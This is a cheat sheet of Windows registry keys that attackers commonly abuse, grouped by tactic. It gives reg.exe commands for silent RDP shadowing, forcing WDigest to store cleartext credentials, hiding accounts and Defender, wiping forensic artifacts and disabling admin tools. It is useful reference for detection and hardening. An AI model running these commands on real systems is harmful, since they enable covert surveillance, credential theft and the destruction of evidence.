Commonly Abused Windows Registry Keys

---

Terminal Services

RDP Shadow - No Prompt

reg.exe add "HKLM\Software\Policies\Microsoft\Windows NT\Terminal Services" /V Shadow /T REG_DWORD /D 2 /F

Delete RDP Connection History

reg.exe" delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f

reg.exe" delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f

Change RDP Port

HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "PortNumber" -Value $portvalue

https://docs.microsoft.com/en-us/windows-server/remote/remote-desktop-services/clients/change-listening-port

Change Prompt for Shadow Session

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow /t REG_DWORD /d 2

0: Deny remote control.
1: Obtain user permission and interact with the session.
2: Do not obtain user permission and interact with the session.
3: Obtain user permission and display session.
4: Do not obtain user permission and display session.

http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/ http://woshub.com/rdp-session-shadow-to-windows-10-user/

Enable (Unsolicited) Remote Assistance

HKEY_LOCAL_MACHINE\Software\policies\Microsoft\Windows NT\Terminal Services\fAllowUnsolicited

HKEY_LOCAL_MACHINE\Software\policies\Microsoft\Windows NT\Terminal Services\fAllowUnsolicitFullControl

---

Credential Access

Store WDigest Credential in Cleartext in Memory

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1

https://www.ired.team/offensive-security/credential-access-and-credential-dumping/forcing-wdigest-to-store-credentials-in-plaintext

Look for private keys saved by PuTTy

reg query "HKEY_CURRENT_USER\Software\SimonTatham\Putty\Sessions"

https://superuser.com/questions/109587/transferring-putty-session-data

---

Defense Evasion

Hide User from Login Page

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v user /t REG_DWORD /d 1 /f

Hide Uninstall Option for Application

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall

https://docs.microsoft.com/en-us/windows/win32/msi/uninstall-registry-key

Remove “Scan with Windows Defender” option from context menu

HKEY_CLASSES_ROOT\Directory\shellex\EPP

https://winaero.com/how-to-delete-scan-with-windows-defender-from-context-menu-in-windows-10/

Hide Windows Defender from Settings Sidebar

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v "SettingsPageVisibility" /t REG_DWORD /d "hide:windowsdefender" /f

https://winaero.com/how-to-show-or-hide-windows-defender-tray-icon-in-windows-10/

Delete Artifacts

Delete MUI Cache

reg delete "HKEY_CURRENT_USER\Software\Classes\Local\Settings\Software\Microsoft\Windows\Shell\MuiCache"

Delete record of typed paths in explorer

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths"

https://forensafe.com/blogs/typedpaths.html

Delete “Most recently used list” (Apps launched from Windows Run Menu)

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Explorer\RunMRU"

Disable Windows Admin Tools

Disable Task Manager

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\disabletaskmgr https://winaero.com/how-to-disable-task-manager-in-windows-10/

Disable navigating to directories via explorer bar

 HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NoRun    https://forums.ivanti.com/s/article/Users-can-access-resources-through-explorer-although-NoRun-is-enabled?language=en_US

Disable Regedit and Reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v "DisableRegistryTools" /t REG_DWORD /d "1" /f

https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsTools::DisableRegedit

Disable CMD

reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System /v "DisableCMD" /t REG_DWORD /d "1" /f

https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsTools::DisableCMD

Disable selected program

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "1" /t REG_SZ /d "Minesweeper.exe" /f

https://github.com/ION28/BLUESPAWN/issues/257 http://systemmanager.ru/win2k_regestry.en/93501.htm

Disable Security and Update related notifications

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAHealth /t REG_DWORD /d 1 /f https://catonrug.blogspot.com/2014/05/remove-action-center-icon-via-group-policy.html

---

Privilege Escalation

MSI installations are done as SYSTEM regardless of the user who installed it

reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated" https://www.securitynik.com/2022/01/beginning-exploitation-of.html